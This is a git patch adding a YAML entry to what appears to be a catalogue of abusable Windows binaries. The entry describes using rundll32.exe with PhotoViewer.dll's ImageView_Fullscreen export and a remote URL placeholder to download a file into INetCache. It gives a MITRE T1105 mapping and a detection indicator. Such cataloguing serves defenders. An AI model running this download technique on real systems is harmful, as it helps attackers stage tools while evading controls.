From 4ea5c504a483ed8338ea4e8e55f48e44cb6edbe1 Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Sat, 28 Jun 2025 17:04:30 +0300
Subject: [PATCH] Add PhotoViewer.yml (#441)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
---
 yml/OSLibraries/PhotoViewer.yml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 yml/OSLibraries/PhotoViewer.yml

diff --git a/yml/OSLibraries/PhotoViewer.yml b/yml/OSLibraries/PhotoViewer.yml
new file mode 100644
index 0000000..92d09c4
--- /dev/null
+++ b/yml/OSLibraries/PhotoViewer.yml
@@ -0,0 +1,24 @@
+---
+Name: PhotoViewer.dll
+Description: Windows Photo Viewer
+Author: Avihay Eldad
+Created: 2025-06-22
+Commands:
+  - Command: rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL}
+    Description: Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.
+    Usecase: Download file from remote location.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Download: INetCache
+Full_Path:
+  - Path: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll
+  - Path: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll
+Detection:
+  - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@avihayeldad'
+  - Person: Tommy Warren